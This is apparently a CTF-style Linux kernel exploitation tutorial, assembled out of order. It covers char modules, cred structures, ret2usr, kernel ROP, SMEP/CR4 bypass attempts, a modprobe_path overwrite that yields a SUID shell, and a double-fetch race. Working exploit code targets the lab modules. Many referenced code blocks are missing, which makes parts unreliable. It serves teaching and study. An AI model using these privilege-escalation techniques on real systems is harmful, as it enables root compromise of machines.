Writing a Char Module is surprisingly simple. First, we specify what happens on init (loading of the module) and exit (unloading of the module). We need some special headers for this.
It looks simple, because it is simple. For now, anyway.
First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()) and unload (intro_exit()). Note that we declare the parameters as void; kernel modules are very picky about parameter lists (even if just void).
We then register the purposes of the functions using module_init() and module_exit().
Note that we use printk rather than printf. GLIBC doesn't exist in kernel mode, so we use the kernel's own built-in functions instead. KERN_ALERT specifies the type (log level) of the message sent.
Compiling
Compiling a Kernel Object can seem a little more complex as we use a Makefile, but it's surprisingly simple:
$(MAKE) is a special variable that effectively calls make, but it propagates all of the same flags that our Makefile was called with. So, for example, if we call
Then $(MAKE) will become make -j 8. Essentially, $(MAKE) is make, which compiles the module. The files produced are defined at the top as obj-m. Note that compilation is unique per kernel, which is why the compiling process uses your unique kernel build section.
Using the Kernel Module
Now we've got a ko file compiled, we can add it to the list of active modules:
If it's successful, there will be no response. But where did it print to?
Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg.
Here we grab the last line using tail - as you can see, our printk is called!
Now let's unload the module:
And there our intro_exit is called.
You can view currently loaded modules using the lsmod command
Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.
Exposing it to the File System
This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init function looks like this:
A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev, but if you pass 0 it is automatically assigned an unused major number.
We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro.
Note that on an error it calls class_destroy and unregister_chrdev:
Cleaning it Up
These additional classes and devices have to be cleaned up in the intro_exit function, and we mark the major number as available:
Controlling I/O
In intro_init, the first line may have been confusing:
The third parameter fops is where all the magic happens, allowing us to create handlers for operations such as read and write. A really simple one would look something like:
The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line up to the 2nd and 3rd parameters for the read() function itself:
We then use the function copy_to_user to write QWERTY to the buffer passed in as a parameter!
Full Code
Simply use sudo insmod to load it.
Testing The Module
Create a really basic exploit.c:
If the module is successfully loaded, the read() call should read QWERTY into buffer:
Success!
Interactivity with IOCTL
A more useful way to interact with the driver
Linux contains a syscall called ioctl, which is often used to communicate with a driver. ioctl() takes three parameters:
File Descriptor fd
an unsigned int
an unsigned long
The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:
But if you want, you can interpret cmd and arg as pointers if that is how you wish your driver to work.
To communicate with the driver in this case, you would use the ioctl() function, which you can import in C:
And you would have to update the file_operations struct:
On modern Linux kernel versions, .ioctl has been removed in favour of .unlocked_ioctl and .compat_ioctl. The former is the replacement for .ioctl, with the latter allowing 32-bit processes to perform ioctl calls on 64-bit systems. As a result, the new file_operations is likely to look more like this:
#define DEVICE_NAME "intro"
#define CLASS_NAME "intro"
// setting up the device
int major;
static struct class* my_class = NULL;
static struct device* my_device = NULL;
static int __init intro_init(void) {
major = register_chrdev(0, DEVICE_NAME, &fops); // explained later
if ( major < 0 ) {
printk(KERN_ALERT "[Intro] Error assigning Major Number!\n");
return major; // bail out instead of carrying on with an invalid major
}
// Register device class
my_class = class_create(THIS_MODULE, CLASS_NAME);
if (IS_ERR(my_class)) {
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to register device class\n");
return PTR_ERR(my_class); // propagate the error
}
// Register the device driver
my_device = device_create(my_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
if (IS_ERR(my_device)) {
class_destroy(my_class);
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to create the device\n");
return PTR_ERR(my_device); // propagate the error
}
return 0;
}
static void __exit intro_exit(void) {
device_destroy(my_class, MKDEV(major, 0)); // remove the device
class_unregister(my_class); // unregister the device class
class_destroy(my_class); // remove the device class
unregister_chrdev(major, DEVICE_NAME); // unregister the major number
printk(KERN_INFO "[Intro] Closing!\n");
}
While the kernel cannot execute code in userland, it can set its RSP to a userland location, so it is possible to stack pivot to userland as long as all of the gadgets used are in kernel space.
I don't think an example is necessary for this.
SMEP
Supervisor Mode Execution Prevention
If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space, and it does this based on the User/Supervisor bit in page tables. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).
In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 register, meaning that if we can control CR4 we can disable SMEP from messing with our exploit.
We can enable SMEP in the kernel by controlling the respective QEMU flag (qemu64 is not notable):
-cpu qemu64,+smep
Sometimes it will be enabled by default, in which case you need to use nosmep.
Kernel ROP - Privilege Escalation in Kernel Space
Bypassing SMEP by ropping through the kernel
The previous approach failed, so let's try and escalate privileges using purely ROP.
Modifying the Payload
Calling prepare_kernel_cred()
First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0):
Now comes the trickiest part, which involves moving the result from RAX to RDI before calling commit_creds().
Moving RAX to RDI for commit_creds()
This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!
I ended up combining these four gadgets:
Gadget 1 is used to set RDX to 0, so we bypass the jne in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Returning to userland
Recall that we need swapgs and then iretq. Both can be found easily.
The pop rbp; ret is not important as iretq jumps away anyway.
To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS, the reverse of the order they are pushed in.
If we try this now, we successfully escalate privileges!
Final Exploit
Kernel ROP - Disabling SMEP
An old technique
Setup
Using the same setup as ret2usr, we make one single modification in run.sh:
Now if we load the VM and run our exploit from last time, we get a kernel panic.
Kernel Panic
It's worth noting what it looks like for the future - especially these 3 lines:
Overwriting CR4
So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: native_write_cr4(). This function quite literally overwrites CR4.
Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms (if we update init to log us in as root):
Ok, it's located at 0xffffffff8102b6d0. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:
CR4 is currently 0x00000000001006b0. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0.
The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage file into a vmlinux ELF file so that we can run ropper or ROPgadget on it. We can do that by running extract-vmlinux, a script from the official Linux git repository.
Putting it all together
All that changes in the exploit is the overflow:
We can then compile it and run.
Failure
This fails. Why?
If we look at the resulting kernel panic, we meet an old friend:
SMEP is enabled again. How? If we debug the exploit, we definitely hit both the gadget and the call to native_write_cr4(). What gives?
Well, if we look at the source of native_write_cr4(), there's another feature:
Essentially, it checks whether the val that we input changes any of the bits defined in cr4_pinned_bits, which stops "sensitive CR bits" from being modified. If any of them have been changed, the change is reverted. Effectively, modifying CR4 this way no longer works on recent kernels.
Overwriting modprobe_path
A simple way to pop a shell
The kernel can request that a kernel module is loaded at runtime. If it does so, it will try to call request_module, which will spawn the modprobe tool using call_modprobe. modprobe is a userspace program that runs with root privileges, finds the required kernel module binary on the filesystem and loads it.
The path to modprobe is in modprobe_path, a global variable in the kernel. We can read the value as a non-root user through /proc/sys/kernel/modprobe, with the default value being /sbin/modprobe.
If we can overwrite modprobe_path with another binary, e.g. /tmp/exec, this will be run with root privileges! That makes it very easy. To trigger modprobe, the easiest way is to execute a binary with an unknown signature:
To identify what program should be run to handle the signature, the kernel uses (code is slightly different in newer versions). This is run by request_module, but the signature .
The approach, therefore, is simple. First compile a /tmp/hijack with source:
There are lots of possible payloads, but the end result is the same. This will copy /bin/sh to /tmp/sh and make it SUID. Now we create a file with an unknown signature:
Finally, overwrite modprobe_path to /tmp/hijack. When we execute /tmp/fake as a regular user, the kernel will spawn /tmp/hijack with root privileges and execute it!
The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.
In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.
You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow here, and I recommend it highly.
Kernel Modules
Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most kernel modules are compiled for a specific kernel version (which can be checked with uname -r, my Xenial Xerus is 4.15.0-128-generic). We can load and unload these modules using the insmod and rmmod commands respectively. Kernel modules are often loaded into /dev/* or /proc/. There are 3 main module types: Char, Block and Network.
Char Modules
Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open. In this way, they're virtually dynamic files (at a super basic level), as the values read and written can be changed.
Examples of Char modules include /dev/random.
I'll be using the term module and device interchangeably. As far as I can tell, they are the same, but please let me know if I'm wrong!
A Basic Kernel Interaction Challenge
The Module
We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:
If we attempt to read() from the device, it checks the authenticated flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!.
In order to update authenticated, we have to write() to the kernel module. What we attempt to write is compared to p4ssw0rd. If it's not equal, nothing happens. If it is, authenticated is updated and the next time we read() it'll return the flag!
Interacting
Let's first try and interact with the kernel by reading from it.
Make sure you sudo chmod 666 /dev/authentication!
We'll start by opening the device and reading from it.
Note that in the module source code, the length of read() is completely disregarded, so we could make it any number at all! Try switching it to 1 and you'll see.
After compiling, we get that we are not authenticated:
Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user() does not automatically add it, so the strcmp will fail otherwise!
It works!
Amazing! Now for something really important:
The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod then insmod, or a system restart).
Final Code
Challenge - IOCTL
So, here's your challenge! Write the same kernel module, but using ioctl instead. Then write a program to interact with it and perform the same operations. ZIP file including both below, but no cheating! This is really good practice.
Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5). The offsets of commit_creds and prepare_kernel_cred() are as follows, and we'll update exploit.c with the new values:
The major number needs to be updated to 253 in init for this version! I've done it automatically, but it bears remembering if you ever try to create your own module.
Instead of an elevated shell, we get a kernel panic, with the following data dump:
I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while , so it happens to all of us!
One thing we can notice is that the error here is listed as a NULL pointer dereference. We can see that the error is thrown in commit_creds():
We can , but chances are that the parameter passed to commit_creds() is NULL - this appears to be the case, since RDI is shown to be 0 above!
Opening a GDBserver
In our run.sh script, we now include the -s flag. This flag opens up a GDB server on port 1234, so we can connect to it and debug the kernel. Another useful flag is -S, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.
What we'll do is pause our exploit binary just before the write() call by using getchar(), which will hang until we hit Enter or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds() is 0xffffffff81077390, we can set a breakpoint there.
We then continue with c and go back to the VM terminal, where we hit Enter to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0:
This explains the NULL dereference. RAX is also 0, in fact, so it's not a problem with the mov:
This means that prepare_kernel_cred() is returning NULL. Why is that? It didn't do that before!
Finding the Issue
Let's compare the differences in prepare_kernel_cred() code between kernel 5.10 and 6.10:
The last and first parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 5.10, it treats it as using init_task:
i.e. if daemon is NULL, use init_task. On 6.10, the behaviour is altogether different:
If daemon is NULL, return NULL - hence our issue! Instead, we have to pass a valid cred struct into RDI. The simplest way is to just pass init_cred, which is actually a static offset from the kernel base! This means that if we're in a position to get commit_creds and prepare_kernel_cred, we can also get init_cred without major issues.
Passing in init_cred
init_cred is defined in the kernel source (kernel/cred.c). There is no symbol associated with it (unless the kernel was compiled with debugging symbols), so we can't read /proc/kallsyms and get the address like that.
Kernel ROP - ret2usr
ROPpety boppety, but now in the kernel
Introduction
By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.
The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0)), and overwrite the return pointer to point there.
Vulnerable Module
Note that the kernel version here is 6.1, due to some modifications we will discuss later.
The relevant code is here:
As we can see, it's a size 0x100 memcpy into an 0x20 buffer. Not the hardest thing in the world to spot. The second printk call here is so that buffer is used somewhere, otherwise it's just optimised out by the compiler and the entire function just becomes xor eax, eax; ret!
Exploitation
Assembly to escalate privileges
Firstly, we want to find the location of prepare_kernel_cred() and commit_creds(). We can do this by reading /proc/kallsyms, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled KASLR.
For obvious reasons, you require root permissions to read this file!
Now we know the locations of the two important functions. After that, the assembly is pretty simple. First we call prepare_kernel_cred(0):
Then we call commit_creds() on the result (which is stored in RAX):
We can throw this directly into the C code using inline assembly:
Overflow
The next step is overflowing. The 7th qword overwrites RIP:
Finally, we create a get_shell() function we call at the end, once we've escalated privileges:
Returning to userland
If we run what we have so far, we fail and the kernel panics. Why is this?
The reason is that once the kernel executes commit_creds(), it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug.
What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state from the start of the program execution, then once we have escalated privileges in kernel mode, we restore the registers to swap to user mode. This reverts execution to the exact state it was before we ever entered kernel mode!
We can store them as follows:
The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate() for after the privileges are acquired:
Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs instruction). The RIP register is updated to point to get_shell and pop a shell.
If we compile it statically and load it into the initramfs.cpio, notice that our privileges are elevated!
We have successfully exploited a ret2usr!
Understanding the restoration
How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what do. The switch to kernel mode is best explained by , or .
swapgs exchanges the current GS base with a value held in one of the MSRs (model-specific registers); at the entry to a kernel-space routine, swapgs enables the process to obtain a pointer to kernel data structures.
Has to swap back to user space
SS - Stack Segment
GS is changed back via the swapgs instruction. All others are changed back via iretq, the QWORD variant of the iret family of Intel instructions. The intent behind iretq is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the Intel Software Developer's Manual:
Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)
[...]
During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.
As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq.
A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.
A Vulnerable Kernel Module
Let's start with a convoluted example, where all we want to do is change the id that the module stores. We are not allowed to set it to 0, as that is the ID of root, but all other values are allowed.
The code below will be the contents of the write() function of a kernel module. I've trimmed it down, but here are the relevant parts:
The program will:
Check if the ID we are attempting to switch to is 0
If it is, it doesn't allow us, as we attempted to log in as root
Sleep for 1 second (this is just to illustrate the example better, we will remove it later)
Simple Communication
Let's say we want to communicate with the module, and we set up a simple C program to do so:
We compile this statically (as there are no shared libraries on our VM):
As expected, the id variable gets set to 900 - we can check this in dmesg:
That all works fine.
Exploiting a Double-Fetch and Switching to ID 0
The flaw here is that creds->id is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials struct:
This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.
Because this struct is controlled by the user, they have the power to change it whenever they like.
The kernel module uses the id field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0):
And once more, to set the id variable:
Again, this might seem fine - but it's not. What is stopping it from changing in between these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.
A Proof-of-Concept: Switching to ID 0
In between the two dereferences of creds->id, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race condition - the aim is to switch id in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900), but by the time it is copied to id, it will have become 0 and we have bypassed the security check.
Here's the plan, visually, if it helps:
In the waiting period, we swap out the id.
If you are trying to compile your own kernel, you need CONFIG_SMP enabled, because we need to modify it in a different thread! Additionally, you need QEMU to have the flag -smp 2 (or more) to enable 2 cores, though it may default to having multiple even without the flag. This example may work without SMP, but that's because of the sleep - when we move onto part 2, with no sleep, we require multiple cores.
The C program will hang on write until the kernel module returns, so we can't use the main thread.
With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id!
We have to compile it statically, as the VM has no shared libraries.
Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio archive (you may want to do this in another folder):
Now copy exploit there and make sure it's marked executable. You can then compress the filesystem again:
Use the newly-created initramfs.cpio to launch the VM with run.sh. Executing exploit, it is successful!
Note that the VM loaded you in as root by default. This is for debugging purposes, as it allows you to use utilities such as dmesg to read the kernel module output and check for errors, as well as a host of other things we will talk about. When testing exploits, it's always helpful to fix the init script to load you in as root! Just don't forget to test it as another user in the end.
The Ultimate Aim of Kernel Exploitation - Process Credentials
Overview
Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL) we are dropped as root.
To understand this, we have to talk a little about how privileges and credentials work in Linux.
KASLR
KASLR is the kernel version of ASLR, randomizing various parts of kernel space to make exploitation more complicated (in the exact same way regular ASLR does so for userspace exploitation).
TODO
Random stuff I want to mention somewhere, but too small for its own page
Discuss sched_yield and CPU affinity.
Kernel code gets patched at runtime (ch4)
Heap Structures
Compare the password to p4ssw0rd
If it is, it will set the id variable to the id in the creds structure
The cred struct contains all the permissions a task holds. The ones that we care about are typically these:
These fields are all unsigned int fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.
Note the __randomize_layout here at the end! This is a compiler annotation that, when the kernel is built with structure layout randomization enabled, shuffles the order of the fields at build time, making it harder to target the structure!
task_struct
The kernel needs to store information about each running task, and to do this it uses the task_struct structure. Each kernel task has its own instance.
The task_struct instances are stored in a linked list, with a global kernel variable init_task pointing to the first one. Each task_struct then points to the next.
Along with linking data, the task_struct also (more importantly) stores real_cred and cred, which are both pointers to a cred struct. The difference between the two is explained here:
In effect, real_cred is the initial credential of the process, and is used by processes acting on the process. cred is the current credential, used to define what the process is allowed to do. We have to keep track of both as some processes care about the initial cred and some about the updated.
An example of caring about the real_cred instead of cred is in the implementation of /proc/$PID/status, which displays the real_cred as the owner of a process, even if privileges are elevated (note that __task_cred is a macro to grab real_cred, confusingly). Conversely, setuid executables will modify cred and not real_cred.
So, which set of credentials do we want to target with an arbitrary write? It will depend on what set is relevant for the purpose, but since you usually want to be creating new processes (through system or execve), the cred is used. In some cases, real_cred will work too, because it seems as if the pointers initially point to the same struct (though note that this excerpt is not from process creation but copy_process, which is called by the fork syscall, so it could differ for new process creation).
prepare_kernel_cred() and commit_creds()
As an alternative to overwriting cred structs in the unpredictable kernel heap, we can call prepare_kernel_cred() to generate a new valid cred struct and commit_creds() to overwrite the real_cred and cred of the current task_struct.
prepare_kernel_cred()
The function can be found here, but there's not much to say - it creates a new cred struct called new then destroys the old. It returns new.
#define PASSWORD "p4ssw0rd"
typedef struct {
int id;
char password[10];
} Credentials;
static int id = 1001;
static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
Credentials *creds = (Credentials *)buf;
printk(KERN_INFO "[Double-Fetch] Reading password from user...");
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
// to increase reliability
msleep(1000);
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
return -1;
}
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
int res_id = write(fd, &creds, 0); // last parameter here makes no difference
printf("New ID: %d\n", res_id);
return 0;
}
gcc -static -o exploit exploit.c
$ dmesg
[...]
[ 3.104165] [Double-Fetch] Password correct! ID set to 900
Credentials *creds = (Credentials *)buf;
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
// gcc -static -o exploit -pthread exploit.c
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void *switcher(void *arg);
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
// communicate with the module
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
// use a random ID and set the password correctly
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
// set up the switcher thread
// pass it a pointer to `creds`, so it can modify it
pthread_t thread;
if (pthread_create(&thread, NULL, switcher, &creds)) {
fprintf(stderr, "Error creating thread\n");
return -1;
}
// now we write the cred struct to the module
// it should be swapped after about .3 seconds by switcher
int res_id = write(fd, &creds, 0);
// write returns the id we switched to
// if all goes well, that is 0
printf("New ID: %d\n", res_id);
// finish thread cleanly
if (pthread_join(thread, NULL)) {
fprintf(stderr, "Error joining thread\n");
return -1;
}
return 0;
}
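void *switcher(void *arg) {
Credentials *creds = (Credentials *)arg;
// wait until the module is sleeping - don't want to change it BEFORE the initial ID check!
// sleep() takes whole seconds, so sleep(0.3) would truncate to sleep(0); usleep() takes microseconds
usleep(300000);
creds->id = 0;
return NULL;
}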
struct cred {
/* ... */
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
/* ... */
} __randomize_layout;
struct task_struct {
/* ... */
/*
* Pointers to the (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->real_parent->pid)
*/
/* Real parent process: */
struct task_struct __rcu *real_parent;
/* Recipient of SIGCHLD, wait4() reports: */
struct task_struct __rcu *parent;
/*
* Children/sibling form the list of natural children:
*/
struct list_head children;
struct list_head sibling;
struct task_struct *group_leader;
/* ... */
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
/* ... */
};
/*
* The security context of a task
*
* The parts of the context break down into two categories:
*
* (1) The objective context of a task. These parts are used when some other
* task is attempting to affect this one.
*
* (2) The subjective context. These details are used when the task is acting
* upon another object, be that a file, a task, a key or whatever.
*
* Note that some members of this structure belong to both categories - the
* LSM security pointer for instance.
*
* A task has two security pointers. task->real_cred points to the objective
* context that defines that task's actual details. The objective part of this
* context is used whenever that task is acted upon.
*
* task->cred points to the subjective context that defines the details of how
* that task is going to act upon another object. This may be overridden
* temporarily to point to another security context, but normally points to the
* same context as task->real_cred.
*/
In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!
This will not work every time (in fact, any single attempt is quite likely to fail), so we will instead have two loops: one thread that keeps writing 0 to the ID, and another that writes a different value (e.g. 900) and then calls write. The aim is for the thread that switches to 0 to sync up so perfectly that the switch occurs in between the ID check and the ID "assignment".
Analysis
If we check the source, we can see that there is no msleep any longer:
Exploitation
Our exploit is going to look slightly different! We'll create the Credentials struct again and set the ID to 900:
Then we are going to write this struct to the module repeatedly. We will loop 1,000,000 times (effectively infinite for our purposes, but bounded so that the program is guaranteed to terminate):
If the ID returned is 0, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.
Now, in the second thread, we will constantly cycle between ID 900 and 0. We do this in the hope that it will be 900 on the first dereference, and 0 on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()! Otherwise your main thread will wait forever for the second to stop!).
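To make the interplay between the two loops concrete, here is a minimal userspace sketch of the same race. It does not talk to /dev/double_fetch at all: double_fetch_login is a hypothetical stand-in for the module's check-then-use logic, and flipper and race are illustrative names rather than part of the original exploit. Atomics are used only so that the simulation is well-defined C.

```c
#include <pthread.h>
#include <stdatomic.h>

/* Userspace model of the struct; id is atomic so both threads may touch it. */
typedef struct {
    atomic_int id;
    char password[10];
} Credentials;

static atomic_int stop_flipping;

/* Hypothetical model of the vulnerable handler: two separate fetches of id. */
int double_fetch_login(Credentials *creds) {
    if (atomic_load(&creds->id) == 0)   /* first fetch: the root check */
        return -1;
    return atomic_load(&creds->id);     /* second fetch: may differ by now */
}

/* Second thread: keep cycling the ID between 0 and 900 until told to stop. */
void *flipper(void *arg) {
    Credentials *creds = arg;
    while (!atomic_load(&stop_flipping)) {
        atomic_store(&creds->id, 0);
        atomic_store(&creds->id, 900);
    }
    return NULL;
}

/* Main loop: retry up to max_tries times. Returns 1 if a login came back
 * as 0 (race won), 0 if it never did, -1 if the thread failed to start. */
int race(Credentials *creds, long max_tries) {
    pthread_t thread;
    int won = 0;

    atomic_store(&stop_flipping, 0);
    if (pthread_create(&thread, NULL, flipper, creds))
        return -1;
    for (long i = 0; i < max_tries && !won; i++)
        won = (double_fetch_login(creds) == 0);

    atomic_store(&stop_flipping, 1);    /* stop the flipper, then join it */
    pthread_join(thread, NULL);
    return won;
}
```

Unlike the infinite loop described above, this flipper is stopped through a flag so that it can be joined cleanly; in a real exploit, letting the thread die with the process is just as good.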
Compile the exploit and run it, and we get the desired result:
Look how quick that was! Insane - two fails, then a success!
Race Analysis
You might be wondering how tight the race window can be for exploitation - well, had a race of two assembly instructions:
The dereferences [rbx] have just one assembly instruction between, yet we are capable of racing. THAT is just how tight!
SMAP
Supervisor Mode Access Prevention
SMAP is a more powerful version of SMEP. Instead of only preventing the kernel from executing code in user space, SMAP places heavy restrictions on accessing user space at all, even for reading or writing data. SMAP blocks the kernel from even dereferencing (i.e. accessing) data that isn't in kernel space, unless the access goes through a small set of very specific functions.
For example, functions such as strcpy or memcpy do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user and copy_to_user, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow acting as a guard against them.
This means that whether you interact using write/read or ioctl, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user was called (unless copy_from_user is called on the same struct multiple times).
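The snapshot idea can be sketched in userspace as follows. This is an analogy rather than module code: memcpy stands in for copy_from_user, single_fetch_login is a hypothetical name, and the password value is the one used by the exploit earlier. The point is that every check and every use reads the private copy, so a second thread changing the original afterwards has no effect.

```c
#include <string.h>

#define PASSWORD "p4ssw0rd"

typedef struct {
    int id;
    char password[10];
} Credentials;

/* Take ONE snapshot of the caller's struct, then only ever look at the copy.
 * In a real module the memcpy would be a copy_from_user call. */
int single_fetch_login(const Credentials *user_creds) {
    Credentials snap;

    memcpy(&snap, user_creds, sizeof(snap));           /* the only fetch */
    snap.password[sizeof(snap.password) - 1] = '\0';  /* force termination */

    if (snap.id == 0)                                  /* check the copy */
        return -1;
    if (strcmp(snap.password, PASSWORD) != 0)
        return -1;
    return snap.id;                                    /* use the same copy */
}
```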
Like SMEP, SMAP is controlled by the CR4 register, in this case bit 21. It is also pinned, so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass"; it will depend on the challenge and will simply have to be accounted for.
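If you have a CR4 value in hand (for example from a crash dump or a debugger), the two protections can be checked with simple bit tests. This is a small sketch with hypothetical helper names; the bit positions (20 for SMEP, 21 for SMAP) are the architectural ones.

```c
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)   /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (1ULL << 21)   /* Supervisor Mode Access Prevention */

/* Return 1 if the SMEP bit is set in the given CR4 value, else 0. */
int cr4_smep_enabled(uint64_t cr4) {
    return (cr4 & CR4_SMEP) != 0;
}

/* Return 1 if the SMAP bit is set in the given CR4 value, else 0. */
int cr4_smap_enabled(uint64_t cr4) {
    return (cr4 & CR4_SMAP) != 0;
}
```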
Enabling SMAP is just as easy as SMEP:
Sometimes it needs to be disabled instead, in which case the option is nosmap.
Stac and Clac Instructions
TODO
Putting Exploit Data Into Kernel Memory instead of Userspace
TODO
KPTI
Kernel Page Table Isolation
KPTI is designed to protect against attacks that abuse the shared user/kernel address space. Originally called KAISER, it is a mitigation created to prevent Meltdown-style microarchitectural vulnerabilities.
